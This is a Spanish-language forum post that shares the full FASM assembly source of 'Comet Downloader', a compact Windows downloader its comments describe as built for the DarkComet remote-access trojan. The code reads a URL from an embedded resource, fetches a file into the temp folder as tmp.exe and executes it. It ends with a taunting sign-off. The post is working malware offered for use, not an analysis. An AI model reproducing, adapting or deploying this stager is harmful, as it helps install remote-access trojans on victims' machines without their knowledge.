Mostrar mensajes previos
Ordenar por
por Kodeinfect Se conecta desde un manicomio

Código: Seleccionar todo

;-----------------------------------;
;     Comet Downloader [FASM]      -;
; Author : DarkCoderSc             -;
; Mail : [email protected]  -;
;----------------------------------------------------------------------;
; Size = 2048o (2ko)                                                  -;
; Server Editor include it will read the ressource %URL% in RT_RCDATA -;
; This sample example will be use on DarkComet-RAT !                  -;
;----------------------------------------------------------------------;

Format PE GUI 4.0

entry start  

include 'c:\FASMW168\include\win32a.inc'

;Var data section rw-------------------------------------
section '.data' data readable writeable 

;Const Values--------------------
CMD_OPEN   db 'open',0
filep      db 'tmp.exe',0
;Unknow values-------------------
handle     dd ?
hRes       dd ?
hReturn    dd ?
sRes       dd ?
pRes       dd ?
Res        db ?
SzBuf      dd ?
;Server Editor Values------------
RC_STR0    db '%URL%',0
TmpDir     rb 256d
;--------------
url        db ?
path       db ?

;Code section--------------------------------------------
section '.code' code readable executable

;Entry point---------------------------------------------
start:
     invoke GetModuleHandle,0
     mov [handle],eax
     ;Server Settings n1---------------------------------
     invoke FindResource,NULL,RC_STR0,RT_RCDATA
     mov [hRes],eax
     invoke LoadResource,NULL,[hRes]
     mov [hReturn],eax
     invoke SizeofResource,NULL,[hRes]
     mov [sRes],eax
     invoke LockResource,[hReturn]
     mov [pRes],eax
     invoke movememory,url,[pRes],[sRes]
     invoke FreeResource,[hReturn]
     xor eax, eax
     ;Finally call the download process------------------
     invoke GetTempPath,TmpDir,TmpDir
     ;Create The Final Path------------------------------
     invoke strcat,TmpDir,filep
     ;Now Download---------------------------------------
     invoke DeleteFile,TmpDir
     invoke URLDownloadToFile,0,url,TmpDir,0,NULL
     invoke ShellExecute,0,CMD_OPEN,TmpDir,0,0,SW_SHOW
exit:
     invoke ExitProcess,0

;Import data section-------------------------------------
section '.idata' import data readable

;Dll names-------------------------------
library urlmon,'URLMON.DLL',\
        Shell32,'SHELL32.DLL',\
        Kernel32,'KERNEL32.DLL',\
        User32,'USER32.DLL'

import urlmon,\
       URLDownloadToFile,'URLDownloadToFileA'

import Shell32,\
       ShellExecute,'ShellExecuteA'

import Kernel32,\
       GetModuleHandle,'GetModuleHandleA',\
       FindResource,'FindResourceA',\
       LoadResource,'LoadResource',\
       SizeofResource,'SizeofResource',\
       LockResource,'LockResource',\
       lstrcpy,'lstrcpy',\
       ExitProcess,'ExitProcess',\
       movememory,'RtlMoveMemory',\
       FreeResource,'FreeResource',\
       ZeroMemory,'RtlZeroMemory',\
       strcat,'lstrcat',\
       GetTempPath,'GetTempPathA',\
       DeleteFile,'DeleteFileA'

import User32,\
       MessageBox,'MessageBoxA'
Welcome to your nightmare, bitch.
Temas Recientes
Links sobre el tema
Variantes de tema
Responder

Volver a “Otros lenguajes”